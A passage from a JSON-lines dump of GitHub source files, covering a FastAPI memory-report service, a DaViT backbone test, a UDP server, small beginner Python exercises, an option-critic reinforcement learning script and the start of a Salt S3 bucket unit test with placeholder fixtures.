')\r\n","repo_name":"llimllib/personal_code","sub_path":"python/illinois_number/htmlgen.py","file_name":"htmlgen.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"} +{"seq_id":"36093724008","text":"from fastapi import FastAPI\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, select, DateTime\nfrom databases import Database\nfrom pydantic import BaseModel,validator\nfrom datetime import datetime\n\nDATABASE_URL = \"sqlite:///./memory_usage.db\"\ndatabase = Database(DATABASE_URL)\n\napp = FastAPI(\n title=\"FastAPI Monitor Memory\",\n description=\"develop by Jafar Esmaili\",\n contract={\n \"name\": \"Jafar Esmaili\",\n \"url\": \"devcoach.ir\",\n \"email\": \"jaffar9898@gmail.com\",\n },\n version=\"0.0.1\"\n)\n\n\n# Define a SQLAlchemy model\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass MemoryReport(Base):\n \"\"\"\n Represents a memory report entity.\n\n Attributes:\n id (int): The unique identifier for the memory report.\n used (float): The amount of used memory.\n free (float): The amount of free memory.\n total (float): The total available memory.\n timestamp (datetime): The timestamp of the memory report.\n \"\"\"\n __tablename__ = \"memory_report\"\n id = Column(Integer, primary_key=True, index=True)\n used = Column(Float)\n free = Column(Float)\n total = Column(Float)\n timestamp = Column(DateTime)\n\n\n\n# Function to connect to the database\nasync def connect_to_db():\n \"\"\"\n Asynchronously connect to the database.\n \"\"\"\n await database.connect()\n\n\n# Function to disconnect from the database\nasync def close_db_connection():\n \"\"\"\n Asynchronously disconnect to the database.\n \"\"\"\n await database.disconnect()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await connect_to_db()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await close_db_connection()\n\n\nclass MemoryReportResponse(BaseModel):\n \"\"\"\n Represents a response model for a memory report.\n\n Attributes:\n id (int): The unique identifier for the memory report.\n used (float): The amount of used memory.\n free (float): The amount of free memory.\n total (float): The total available memory.\n timestamp (datetime): The timestamp of the memory report.\n \"\"\"\n id: int\n used: float\n free: float\n total: float\n timestamp: datetime\n\n@app.get(\"/memory-reports/\")\nasync def get_items():\n \"\"\"\n Retrieve a list of memory reports from the database.\n\n Returns:\n List[MemoryReportResponse]: A list of memory report responses.\n \"\"\"\n query = select([MemoryReport])\n results = await database.fetch_all(query)\n item_responses = [MemoryReportResponse(**result) for result in results]\n\n return item_responses\n","repo_name":"esmaily/memry-monitor","sub_path":"async_main.py","file_name":"async_main.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36074568338","text":"from copy import deepcopy\nfrom unittest import TestCase\n\nimport torch\n\nfrom mmpretrain.models.backbones import DaViT\nfrom mmpretrain.models.backbones.davit import SpatialBlock\n\n\nclass TestDaViT(TestCase):\n\n def setUp(self):\n self.cfg = dict(arch='t', patch_size=4, drop_path_rate=0.1)\n\n def test_structure(self):\n # Test invalid default arch\n with self.assertRaisesRegex(AssertionError, 'not in default archs'):\n cfg = deepcopy(self.cfg)\n cfg['arch'] = 'unknown'\n DaViT(**cfg)\n\n # Test invalid custom arch\n with self.assertRaisesRegex(AssertionError, 'Custom arch needs'):\n cfg = deepcopy(self.cfg)\n cfg['arch'] = {\n 'num_layers': 24,\n 'num_heads': 16,\n 'feedforward_channels': 4096\n }\n DaViT(**cfg)\n\n # Test custom arch\n cfg = deepcopy(self.cfg)\n cfg['arch'] = {\n 'embed_dims': 64,\n 'num_heads': [3, 3, 3, 3],\n 'depths': [1, 1, 2, 1]\n }\n model = DaViT(**cfg)\n self.assertEqual(model.embed_dims, 64)\n self.assertEqual(model.num_layers, 4)\n for layer in model.stages:\n self.assertEqual(\n layer.blocks[0].spatial_block.attn.w_msa.num_heads, 3)\n\n def test_init_weights(self):\n # test weight init cfg\n cfg = deepcopy(self.cfg)\n cfg['init_cfg'] = [\n dict(\n type='Kaiming',\n layer='Conv2d',\n mode='fan_in',\n nonlinearity='linear')\n ]\n model = DaViT(**cfg)\n ori_weight = model.patch_embed.projection.weight.clone().detach()\n\n model.init_weights()\n initialized_weight = model.patch_embed.projection.weight\n self.assertFalse(torch.allclose(ori_weight, initialized_weight))\n\n def test_forward(self):\n imgs = torch.randn(1, 3, 224, 224)\n\n cfg = deepcopy(self.cfg)\n model = DaViT(**cfg)\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n self.assertEqual(outs[0].shape, (1, 768, 7, 7))\n\n # Test forward with multi out indices\n cfg = deepcopy(self.cfg)\n cfg['out_indices'] = [2, 3]\n model = DaViT(**cfg)\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 2)\n self.assertEqual(outs[0].shape, (1, 384, 14, 14))\n self.assertEqual(outs[1].shape, (1, 768, 7, 7))\n\n # test with checkpoint forward\n cfg = deepcopy(self.cfg)\n cfg['with_cp'] = True\n model = DaViT(**cfg)\n for m in model.modules():\n if isinstance(m, SpatialBlock):\n self.assertTrue(m.with_cp)\n model.init_weights()\n model.train()\n\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n self.assertEqual(outs[0].shape, (1, 768, 7, 7))\n\n # Test forward with dynamic input size\n imgs1 = torch.randn(1, 3, 224, 224)\n imgs2 = torch.randn(1, 3, 256, 256)\n imgs3 = torch.randn(1, 3, 256, 309)\n cfg = deepcopy(self.cfg)\n model = DaViT(**cfg)\n for imgs in [imgs1, imgs2, imgs3]:\n outs = model(imgs)\n self.assertIsInstance(outs, tuple)\n self.assertEqual(len(outs), 1)\n expect_feat_shape = (imgs.shape[2] // 32, imgs.shape[3] // 32)\n self.assertEqual(outs[0].shape, (1, 768, *expect_feat_shape))\n","repo_name":"open-mmlab/mmpretrain","sub_path":"tests/test_models/test_backbones/test_davit.py","file_name":"test_davit.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":2849,"dataset":"github-code","pt":"27"} +{"seq_id":"14664745351","text":"from socket import socket, AF_INET, SOCK_DGRAM\nimport UDP_Common as common\n\n# LoopBack Address and Port Number Set here.\nUDP_IP = \"127.0.0.1\"\nUDP_PORT = 6005\n\n\n# Create the socket\nsock = socket(AF_INET, SOCK_DGRAM)\nsock.bind((UDP_IP, UDP_PORT))\n\n# Initial message has sequence number 0.\nexpected_seq = 0\n\n\nwhile True:\n # Receive Data\n data, addr = sock.recvfrom(1024) # Buffer size is 1024 bytes.\n UDP_Packet = common.unpack(data)\n print(\"Message from Client:\", UDP_Packet)\n\n # Create the Checksum for comparison.\n values = [UDP_Packet[0], UDP_Packet[1], UDP_Packet[2]]\n chksum = common.create_checksum(values)\n\n # Compare Checksums to test for corrupt data.\n if UDP_Packet[3] == chksum:\n print('CheckSums Match, Packet OK')\n\n ack_values = [1, UDP_Packet[1], b'']\n\n # If expected sequence number then update for new expected seq.\n if UDP_Packet[1] == expected_seq:\n expected_seq = 1 - expected_seq\n\n else:\n print('Checksums do not match. Packet Corrupt.')\n\n ack_values = [1, 1-expected_seq, b'']\n\n # Create the Checksum for the message and build the packet.\n chksum = common.create_checksum(ack_values)\n pkt = common.buildpacket(ack_values, chksum)\n\n # Print the packet contents and send to client.\n print(\"Message to Client: \", common.unpack(pkt))\n sock.sendto(pkt, addr)\n","repo_name":"mshubat/networking","sub_path":"rdtwithudp/UDP_Server.py","file_name":"UDP_Server.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72684040391","text":"\"\"\"\nWrite a program to input the size of the square matrix and create the matrix with random numbers and convert a square matrix \ninto a lower triangular matrix.\n\nInput:\n4\n12 2 5 6\n10 11 4 1\n32 1 4 10\n1 2 10 9\n\nOutput:\n12 0 0 0\n10 11 0 0\n32 1 4 0\n1 2 10 9\n\"\"\"\nimport random\n\nwhile True:\n r = int(input(\"Enter the number of rows: \"))\n c = int(input(\"Enter the number of columns: \"))\n if(r==c):\n rows = r + 1\n col = c + 1\n break\n else:\n print(\"Please enter same no of rows and columns to generate the square marix\")\n continue\n \ncount = 0\nlist = [[random.randrange(1,50,1) for i in range(1,rows)] for j in range(1,col)]\n\nfor i in range(len(list)):\n for j in range(len(list[i])):\n \n print(list[i][j],end = \" \")\n print()\n \nprint(\"\\nThe Upper triangular matrix of the generated matrix is : \\n\")\n \nfor i in range(len(list)):\n for j in range(len(list[i])):\n \n if(i < j):\n list[i][j] = 0\n print(list[i][j], end = \" \")\n print()\n \n","repo_name":"malladi2610/Python_programs","sub_path":"Assignment_programs/Assignment_1/Assignment2.3.py","file_name":"Assignment2.3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6637110162","text":"import numpy as np\n\n# logsumexp() and expit() are used because they are\n# numerically stable\n# expit() is the sigmoid function\nfrom scipy.misc import logsumexp\nfrom scipy.special import expit\n\nfrom time import sleep\n\nfrom IPython.display import clear_output\nimport matplotlib.pyplot as plt\n\nclass FourRooms:\n\n\tdef __init__(self):\n\t\tlayout = \"\"\"\\\nwwwwwwwwwwwww\nw w w\nw w w\nw w\nw w w\nw w w\nww wwww w\nw www www\nw w w\nw w w\nw w\nw w w\nwwwwwwwwwwwww\n\"\"\"\n\t\tself.occupancy = np.array([list(map(lambda c: 1 if c=='w' else 0, line)) for line in layout.splitlines()])\n\t\t\n\t\t# Four possible actions\n\t\t# 0: UP\n\t\t# 1: DOWN\n\t\t# 2: LEFT\n\t\t# 3: RIGHT\n\t\tself.action_space = np.array([0, 1, 2, 3])\n\t\tself.observation_space = np.zeros(np.sum(self.occupancy == 0))\n\t\tself.directions = [np.array((-1,0)), np.array((1,0)), np.array((0,-1)), np.array((0,1))]\n\n\t\t# Random number generator\n\t\tself.rng = np.random.RandomState(1234)\n\n\t\tself.tostate = {}\n\t\tstatenum = 0\n\t\tfor i in range(13):\n\t\t\tfor j in range(13):\n\t\t\t\tif self.occupancy[i,j] == 0:\n\t\t\t\t\tself.tostate[(i,j)] = statenum\n\t\t\t\t\tstatenum += 1\n\t\tself.tocell = {v:k for k, v in self.tostate.items()}\n\n\n\t\tself.goal = 62 # East doorway\n\t\tself.init_states = list(range(self.observation_space.shape[0]))\n\t\tself.init_states.remove(self.goal)\n\n\n\tdef render(self, show_goal=True):\n\t\tcurrent_grid = np.array(self.occupancy)\n\t\tcurrent_grid[self.current_cell[0], self.current_cell[1]] = -1\n\t\tif show_goal:\n\t\t\tgoal_cell = self.tocell[self.goal]\n\t\t\tcurrent_grid[goal_cell[0], goal_cell[1]] = -1\n\t\treturn current_grid\n\n\tdef reset(self):\n\t\tstate = self.rng.choice(self.init_states)\n\t\tself.current_cell = self.tocell[state]\n\t\treturn state\n\n\tdef check_available_cells(self, cell):\n\t\tavailable_cells = []\n\n\t\tfor action in range(len(self.action_space)):\n\t\t\tnext_cell = tuple(cell + self.directions[action])\n\n\t\t\tif not self.occupancy[next_cell]:\n\t\t\t\tavailable_cells.append(next_cell)\n\n\t\treturn available_cells\n\t\t\n\n\tdef step(self, action):\n\t\t'''\n\t\tTakes a step in the environment with 2/3 probability. And takes a step in the\n\t\tother directions with probability 1/3 with all of them being equally likely.\n\t\t'''\n\n\t\tnext_cell = tuple(self.current_cell + self.directions[action])\n\n\t\tif not self.occupancy[next_cell]:\n\n\t\t\tif self.rng.uniform() < 1/3:\n\t\t\t\tavailable_cells = self.check_available_cells(self.current_cell)\n\t\t\t\tself.current_cell = available_cells[self.rng.randint(len(available_cells))]\n\n\t\t\telse:\n\t\t\t\tself.current_cell = next_cell\n\n\t\tstate = self.tostate[self.current_cell]\n\n\t\t# When goal is reached, it is done\n\t\tdone = state == self.goal\n\n\n\t\treturn state, float(done), done, None\n\n\n \nclass EpsGreedyPolicy():\n\n\tdef __init__(self, rng, nstates, noptions, epsilon):\n\t\tself.rng = rng\n\t\tself.nstates = nstates\n\t\tself.noptions = noptions\n\t\tself.epsilon = epsilon\n\t\tself.Q_Omega_table = np.zeros((nstates, noptions))\n\n\tdef Q_Omega(self, state, option=None):\n\t\tif option is None:\n\t\t\treturn self.Q_Omega_table[state,:]\n\t\telse:\n\t\t\treturn self.Q_Omega_table[state, option]\n\n\tdef sample(self, state):\n\t\tif self.rng.uniform() < self.epsilon:\n\t\t\treturn int(self.rng.randint(self.noptions))\n\t\telse:\n\t\t\treturn int(np.argmax(self.Q_Omega(state)))\n\n\nclass SoftmaxPolicy():\n\n\tdef __init__(self, rng, lr, nstates, nactions, temperature=1.0):\n\t\tself.rng = rng\n\t\tself.lr = lr\n\t\tself.nstates = nstates\n\t\tself.nactions = nactions\n\t\tself.temperature = temperature\n\t\tself.weights = np.zeros((nstates, nactions))\n\n\tdef Q_U(self, state, action=None):\n\t\tif action is None:\n\t\t\treturn self.weights[state,:]\n\t\telse:\n\t\t\treturn self.weights[state, action]\n\n\tdef pmf(self, state):\n\t\texponent = self.Q_U(state) / self.temperature\n\t\treturn np.exp(exponent - logsumexp(exponent))\n\n\tdef sample(self, state):\n\t\treturn int(self.rng.choice(self.nactions, p=self.pmf(state)))\n\n\tdef gradient(self):\n\t\tpass\n\n\tdef update(self, state, action, Q_U):\n\t\tactions_pmf = self.pmf(state)\n\t\tself.weights[state, :] -= self.lr * actions_pmf * Q_U\n\t\tself.weights[state, action] += self.lr * Q_U\n\n\nclass SigmoidTermination():\n\n\tdef __init__(self, rng, lr, nstates):\n\t\tself.rng = rng\n\t\tself.lr = lr\n\t\tself.nstates = nstates\n\t\tself.weights = np.zeros((nstates,))\n\n\tdef pmf(self, state):\n\t\treturn expit(self.weights[state])\n\n\tdef sample(self, state):\n\t\treturn int(self.rng.uniform() < self.pmf(state))\n\n\tdef gradient(self, state):\n\t\treturn self.pmf(state) * (1.0 - self.pmf(state)), state\n\n\tdef update(self, state, advantage):\n\t\tmagnitude, direction = self.gradient(state)\n\t\tself.weights[direction] -= self.lr * magnitude * advantage\n\n\nclass Critic():\n\n\tdef __init__(self, lr, discount, Q_Omega_table, nstates, noptions, nactions):\n\t\tself.lr = lr\n\t\tself.discount = discount\n\t\tself.Q_Omega_table = Q_Omega_table\n\t\tself.Q_U_table = np.zeros((nstates, noptions, nactions))\n\n\tdef cache(self, state, option, action):\n\t\tself.last_state = state\n\t\tself.last_option = option\n\t\tself.last_action = action\n\t\tself.last_Q_Omega = self.Q_Omega(state, option)\n\n\tdef Q_Omega(self, state, option=None):\n\t\tif option is None:\n\t\t\treturn self.Q_Omega_table[state, :]\n\t\telse:\n\t\t\treturn self.Q_Omega_table[state, option]\n\n\tdef Q_U(self, state, option, action):\n\t\treturn self.Q_U_table[state, option, action]\n\n\tdef A_Omega(self, state, option=None):\n\t\tadvantage = self.Q_Omega(state) - np.max(self.Q_Omega(state))\n\n\t\tif option is None:\n\t\t\treturn advantage\n\t\telse:\n\t\t\treturn advantage[option]\n\n\tdef update_Qs(self, state, option, action, reward, done, terminations):\n\t\t# One step target for Q_Omega\n\t\ttarget = reward\n\t\tif not done:\n\t\t\tbeta_omega = terminations[self.last_option].pmf(state)\n\t\t\ttarget += self.discount * ((1.0 - beta_omega)*self.Q_Omega(state, self.last_option) + \\\n\t\t\t\t\t\tbeta_omega*np.max(self.Q_Omega(state)))\n\n\t\t# Difference update\n\t\ttderror_Q_Omega = target - self.last_Q_Omega\n\t\tself.Q_Omega_table[self.last_state, self.last_option] += self.lr * tderror_Q_Omega\n\n\t\ttderror_Q_U = target - self.Q_U(self.last_state, self.last_option, self.last_action)\n\t\tself.Q_U_table[self.last_state, self.last_option, self.last_action] += self.lr * tderror_Q_U\n\n\t\t# Cache\n\t\tself.last_state = state\n\t\tself.last_option = option\n\t\tself.last_action = action\n\t\tif not done:\n\t\t\tself.last_Q_Omega = self.Q_Omega(state, option)\n\n\ndef train_oc(n_options=4, nruns=10, nsteps=1000, seed=1234):\n # Discount\n discount = 0.99\n\n # Learning rates - termination, intra-option, critic\n lr_term = 0.25\n lr_intra = 0.25\n lr_critic = 0.5\n\n # Epsilon for epsilon-greedy for policy over options\n epsilon = 1e-1\n\n # Temperature for softmax\n temperature = 1e-2\n\n # Number of runs\n #nruns = nruns\n\n # Number of episodes per run\n nepisodes = nsteps\n\n # Maximum number of steps per episode\n nsteps = 1000\n\n # Number of options\n noptions = n_options\n \n # Random number generator for reproducability\n rng = np.random.RandomState(seed)\n # The possible next goals (all in the lower right room)\n possible_next_goals = [68, 69, 70, 71, 72, 78, 79, 80, 81, 82, 88, 89, 90, 91, 92, 93, 99, 100, 101, 102, 103]\n \n env = FourRooms()\n env.reset()\n\n clear_output(True)\n plt.imshow(env.render(show_goal=False), cmap='Blues')\n plt.axis('off')\n plt.show()\n \n # History of steps and average durations\n history = np.zeros((nruns, nepisodes, 2))\n\n option_terminations_list = []\n\n for run in range(nruns):\n\n env = FourRooms()\n\n nstates = env.observation_space.shape[0]\n nactions = env.action_space.shape[0]\n\n # Following three belong to the Actor\n\n # 1. The intra-option policies - linear softmax functions\n option_policies = [SoftmaxPolicy(rng, lr_intra, nstates, nactions, temperature) for _ in range(noptions)]\n\n # 2. The termination function - linear sigmoid function\n option_terminations = [SigmoidTermination(rng, lr_term, nstates) for _ in range(noptions)]\n\n # 3. The epsilon-greedy policy over options\n policy_over_options = EpsGreedyPolicy(rng, nstates, noptions, epsilon)\n\n # Critic\n critic = Critic(lr_critic, discount, policy_over_options.Q_Omega_table, nstates, noptions, nactions)\n\n print('Goal: ', env.goal)\n\n for episode in range(nepisodes):\n\n # Change goal location after 1000 episodes \n # Comment it for not doing transfer experiments\n if episode == 1000:\n env.goal = rng.choice(possible_next_goals)\n print('New goal: ', env.goal)\n\n state = env.reset()\n\n option = policy_over_options.sample(state)\n action = option_policies[option].sample(state)\n\n critic.cache(state, option, action)\n\n duration = 1\n option_switches = 0\n avg_duration = 0.0\n\n for step in range(nsteps):\n\n state, reward, done, _ = env.step(action)\n\n # Termination might occur upon entering new state\n if option_terminations[option].sample(state):\n option = policy_over_options.sample(state)\n option_switches += 1\n avg_duration += (1.0/option_switches)*(duration - avg_duration)\n duration = 1\n\n action = option_policies[option].sample(state)\n\n # Critic update\n critic.update_Qs(state, option, action, reward, done, option_terminations)\n\n # Intra-option policy update with baseline\n Q_U = critic.Q_U(state, option, action)\n Q_U = Q_U - critic.Q_Omega(state, option)\n option_policies[option].update(state, action, Q_U)\n\n # Termination condition update\n option_terminations[option].update(state, critic.A_Omega(state, option))\n\n duration += 1\n\n if done:\n break\n\n history[run, episode, 0] = step\n history[run, episode, 1] = avg_duration\n\n option_terminations_list.append(option_terminations)\n\n # Plot stuff\n clear_output(True)\n plt.figure(figsize=(20,6))\n plt.subplot(121)\n plt.title('run: %s' % run)\n plt.xlabel('episodes')\n plt.ylabel('steps')\n plt.plot(np.mean(history[:run+1,:,0], axis=0))\n plt.grid(True)\n plt.subplot(122)\n plt.title('run: %s' % run)\n plt.xlabel('episodes')\n plt.ylabel('avg. option duration')\n plt.plot(np.mean(history[:run+1,:,1], axis=0))\n plt.grid(True)\n plt.show()\n \n ################\n #Plot termination\n ################\n \n for run in range(nruns):\n \n termination_maps = [env.occupancy.astype('float64') for _ in range(noptions)]\n\n for option in range(noptions):\n state = 0\n for i in range(13):\n for j in range(13):\n if termination_maps[option][i,j] == 0:\n termination_maps[option][i,j] = option_terminations_list[run][option].pmf(state)\n state += 1\n\n clear_output(True)\n print('Run: {}'.format(run))\n plt.figure(figsize=(20,5))\n plt.subplot(141)\n plt.title('option: 0', fontsize=20)\n plt.imshow(termination_maps[0], cmap='Blues')\n plt.axis('off')\n plt.subplot(142)\n plt.title('option: 1', fontsize=20)\n plt.imshow(termination_maps[1], cmap='Blues')\n plt.axis('off')\n plt.subplot(143)\n plt.title('option: 2', fontsize=20)\n plt.imshow(termination_maps[2], cmap='Blues')\n plt.axis('off')\n plt.subplot(144)\n plt.title('option: 3', fontsize=20)\n plt.imshow(termination_maps[3], cmap='Blues')\n plt.axis('off')\n plt.show()\n sleep(2)\n \n ##########\n # Run test\n #########\n policy_over_options.epsilon = 0\n for option in range(noptions):\n option_policies[option].temperature = 1e-10\n\n env = FourRooms()\n\n nepisodes = 10\n\n rng = np.random.RandomState(1234)\n\n for episode in range(nepisodes):\n\n state = env.reset()\n\n option = policy_over_options.sample(state)\n\n for step in range(nsteps):\n\n action = option_policies[option].sample(state)\n\n state, reward, done, _ = env.step(action)\n\n # Termination might occur upon entering new state\n if option_terminations[option].sample(state):\n option = policy_over_options.sample(state)\n\n clear_output(True)\n plt.figure(figsize=(10,4))\n plt.subplot(121)\n plt.title('episode: {}, step: {}'.format(episode, step), fontsize=20)\n plt.imshow(env.render(), cmap='Blues', )\n plt.axis('off')\n plt.subplot(122)\n plt.title('option: %s' %option, fontsize=20)\n plt.imshow(termination_maps[option], cmap='Blues')\n plt.axis('off')\n plt.show()\n\n if done:\n break\n\n print(\"Goal reached!\")\n sleep(2)\n ","repo_name":"hvedr/tcs-risk-rl-course","sub_path":"seminars/hier1/option_critic_table.py","file_name":"option_critic_table.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25437662819","text":"print(\"\")\nprint(\"Welcome to RN Mortgage Calculator.\")\namount = input(\"Please enter amount without interest (Do not include currency symbol). \")\nif(str.isdigit(str(amount))):\n years = input(\"Please enter years. \")\n amount = float(amount) + (float(amount) * 0.03)\n amount = round(amount, 2)\n if(str.isdigit(str(years))):\n yearsComplete = input(\"Please enter years that have been completed. \")\n months = int(years) * 12\n if(str.isdigit(str(yearsComplete)) and int(yearsComplete) < int(years)):\n amountComplete = input(\"Please enter the amount that you have paid already (Do not include currency symbol). \")\n monthsComplete = int(yearsComplete) * 12\n if(str.isdigit(str(amountComplete)) and int(amountComplete) < int(amount)):\n amountLeft = float(amount) - int(amountComplete)\n amountLeft = round(amountLeft, 2)\n monthsLeft = months - monthsComplete\n averageLeft = amountLeft / monthsLeft\n print(\"You have to pay \" + str(amountLeft) + \" in \" + str(monthsLeft) + \" months at \" + str(averageLeft) + \" per month.\")\n average = float(amount) / months\n average = round(average, 2)\n if(average < averageLeft):\n aboveBelow = \"below\"\n end = \"You've got to pay up quickly!\"\n elif(average > averageLeft):\n aboveBelow = \"above\"\n end = \"You can sit back and relax!\"\n else:\n aboveBelow = \"on\"\n end = \"You're right on the mark!\"\n print(\"You are \" + aboveBelow + \" average. The average for the full mortgage is \" + str(average) + \" per month and your average left is \" + str(averageLeft) + \" per month. \" + end)\n \n elif(amountComplete >= amount):\n print(\"Amount complete must be less than amount\")\n \n else:\n print(\"Please enter a number instead.\")\n\n elif(yearsComplete >= years):\n print(\"Years complete must be less than years\")\n \n else:\n print(\"Please enter a number instead.\")\n\n else:\n print(\"Please enter a number instead (currency symbols not allowed).\")\n\nelse:\n print(\"Please enter a number instead (currency symbols not allowed).\")\n\nprint(\"\")","repo_name":"nayakrujul/python-scripts","sub_path":"Old Programs/Mortgage_Calculator.py","file_name":"Mortgage_Calculator.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5717455738","text":"def choose(n, k):\n first = 1\n second = 1\n third = 1\n for i in range (n):\n first = first* (n-i)\n for x in range (k):\n second = second*(k-x)\n for a in range (n-k):\n third *= (n-k) - a\n solution = first/(second*third)\n return solution\n","repo_name":"pranjaj011/CEMC-CS-circles-exercises","sub_path":"Chapter15/Be choosy pt2 without import.py","file_name":"Be choosy pt2 without import.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24151619466","text":"# https://swexpertacademy.com/main/code/problem/problemDetail.do?problemLevel=1&contestProbId=AV5QSEhaA5sDFAUq&categoryId=AV5QSEhaA5sDFAUq&categoryType=CODE&problemTitle=&orderBy=FIRST_REG_DATETIME&selectCodeLang=PYTHON&select-1=1&pageSize=30&pageIndex=1\nimport sys\ninput = sys.stdin.readline\n\nT = int(input())\nfor i in range(1, T + 1):\n ary = list(map(int, input().split()))\n sum = 0\n for a in ary:\n if a % 2 == 1:\n sum += a\n print(f\"#{i} {sum}\")","repo_name":"kmg733/CodingTest","sub_path":"SWEA/D1/2072_홀수만 더하기.py","file_name":"2072_홀수만 더하기.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6224733344","text":"# -*- coding: utf-8 -*-\n\n# Import Python libs\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom copy import deepcopy\nimport logging\nimport random\nimport string\n\n# Import Salt Testing libs\nfrom tests.support.mixins import LoaderModuleMockMixin\nfrom tests.support.unit import skipIf, TestCase\nfrom tests.support.mock import MagicMock, NO_MOCK, NO_MOCK_REASON, patch\n\n# Import Salt libs\nfrom salt.ext import six\nimport salt.loader\nfrom salt.utils.versions import LooseVersion\nimport salt.states.boto_s3_bucket as boto_s3_bucket\n\n# pylint: disable=import-error,no-name-in-module,unused-import\nfrom tests.unit.modules.test_boto_s3_bucket import BotoS3BucketTestCaseMixin\n\n# Import 3rd-party libs\nfrom salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin\ntry:\n import boto\n import boto3\n from botocore.exceptions import ClientError\n HAS_BOTO = True\nexcept ImportError:\n HAS_BOTO = False\n\n# pylint: enable=import-error,no-name-in-module,unused-import\n\n# the boto_s3_bucket module relies on the connect_to_region() method\n# which was added in boto 2.8.0\n# https://github.com/boto/boto/commit/33ac26b416fbb48a60602542b4ce15dcc7029f12\nrequired_boto3_version = '1.2.1'\n\nlog = logging.getLogger(__name__)\n\n\ndef _has_required_boto():\n '''\n Returns True/False boolean depending on if Boto is installed and correct\n version.\n '''\n if not HAS_BOTO:\n return False\n elif LooseVersion(boto3.__version__) < LooseVersion(required_boto3_version):\n return False\n else:\n return True\n\nif _has_required_boto():\n region = 'us-east-1'\n access_key = 'GKTADJGHEIQSXMKKRBJ08H'\n secret_key = 'askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs'\n conn_parameters = {'region': region, 'key': access_key, 'keyid': secret_key, 'profile': {}}\n error_message = 'An error occurred (101) when calling the {0} operation: Test-defined error'\n not_found_error = ClientError({\n 'Error': {\n 'Code': '404',\n 'Message': \"Test-defined error\"\n }\n }, 'msg')\n error_content = {\n 'Error': {\n 'Code': 101,\n 'Message': \"Test-defined error\"\n }\n }\n list_ret = {\n 'Buckets': [{\n 'Name': 'mybucket',\n 'CreationDate': None\n }],\n 'Owner': {\n 'Type': 'CanonicalUser',\n 'DisplayName': 'testuser',\n 'ID': '111111222222'\n },\n 'ResponseMetadata': {'Key': 'Value'}\n }\n config_in = {\n 'LocationConstraint': 'EU',\n 'ACL': {\n 'ACL': 'public-read'\n },\n 'CORSRules': [{\n 'AllowedMethods': [\"GET\"],\n 'AllowedOrigins': [\"*\"],\n }],\n 'LifecycleConfiguration': [{\n 'Expiration': {\n 'Days': 1\n },\n 'Prefix': 'prefix',\n 'Status': 'Enabled',\n 'ID': 'asdfghjklpoiuytrewq'\n }],\n 'Logging': {\n 'TargetBucket': 'my-bucket',\n 'TargetPrefix': 'prefix'\n },\n 'NotificationConfiguration': {\n 'LambdaFunctionConfigurations': [{\n 'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',\n 'Id': 'zxcvbnmlkjhgfdsa',\n 'Events': [\"s3:ObjectCreated:*\"],\n 'Filter': {\n 'Key': {\n 'FilterRules': [{\n 'Name': 'prefix',\n 'Value': 'string'\n }]\n }\n }\n }]\n },\n 'Policy': {\n 'Version': \"2012-10-17\",\n 'Statement': [{\n 'Sid': \"\",\n 'Effect': \"Allow\",\n 'Principal': {\n 'AWS': \"arn:aws:iam::111111222222:root\"\n },\n 'Action': \"s3:PutObject\",\n 'Resource': \"arn:aws:s3:::my-bucket/*\"\n }]\n },\n 'Replication': {\n 'Role': 'arn:aws:iam::11111222222:my-role',\n 'Rules': [{\n 'ID': \"r1\",\n 'Prefix': \"prefix\",\n 'Status': \"Enabled\",\n 'Destination': {\n 'Bucket': \"arn:aws:s3:::my-bucket\"\n }\n }]\n },\n 'RequestPayment': {\n 'Payer': 'Requester'\n },\n 'Tagging': {\n 'a': 'b',\n 'c': 'd'\n },\n 'Versioning': {\n 'Status': 'Enabled'\n },\n 'Website': {\n 'ErrorDocument': {\n 'Key': 'error.html'\n },\n 'IndexDocument': {\n 'Suffix': 'index.html'\n }\n }\n }\n config_ret = {\n 'get_bucket_acl': {\n 'Grants': [{\n 'Grantee': {\n 'Type': 'Group',\n 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'\n },\n 'Permission': 'READ'\n }],\n 'Owner': {\n 'DisplayName': 'testuser',\n 'ID': '111111222222'\n }\n },\n 'get_bucket_cors': {\n 'CORSRules': [{\n 'AllowedMethods': [\"GET\"],\n 'AllowedOrigins': [\"*\"],\n }]\n },\n 'get_bucket_lifecycle_configuration': {\n 'Rules': [{\n 'Expiration': {\n 'Days': 1\n },\n 'Prefix': 'prefix',\n 'Status': 'Enabled',\n 'ID': 'asdfghjklpoiuytrewq'\n }]\n },\n 'get_bucket_location': {\n 'LocationConstraint': 'EU'\n },\n 'get_bucket_logging': {\n 'LoggingEnabled': {\n 'TargetBucket': 'my-bucket',\n 'TargetPrefix': 'prefix'\n }\n },\n 'get_bucket_notification_configuration': {\n 'LambdaFunctionConfigurations': [{\n 